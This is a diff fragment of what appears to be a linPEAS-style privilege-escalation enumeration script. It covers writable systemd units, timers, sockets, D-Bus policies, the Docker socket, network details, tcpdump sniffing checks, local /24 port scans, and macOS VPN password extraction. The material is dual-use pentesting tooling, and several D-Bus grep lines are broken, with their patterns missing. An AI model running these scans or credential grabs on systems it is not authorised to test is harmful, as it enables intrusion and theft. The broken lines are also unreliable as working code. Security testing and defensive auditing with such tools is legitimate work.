"%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - done - echo "" + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done + #TODO: identify allows in context="default" done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi - echo "" +done +else echo_not_found "busctl" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) +if echo $CHECKS | grep -q network_information; +print_title "Network Information" +########################################### +#---------) Network Information (---------# +########################################### - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" +#-- NI) /etc/inetd.conf +print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" +(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" +echo "" - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null +#-- NI) Neighbours +print_2title "Networks and neighbours" +if [ "$MACOS" ]; then + netstat -rn 2>/dev/null +else + (route || ip n || cat /proc/net/route) 2>/dev/null +fi +(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +print_2title "Iptables rules" +(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" +echo "" + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports echo "" - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + print_2title "VLANs" + networksetup -listVLANs echo "" - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi echo "" - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" + print_2title "Scanning local networks (using /24)" - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi + if ! [ "$PING" ] && ![ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" fi - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null echo "" - fi - done - fi + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," echo "" - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - 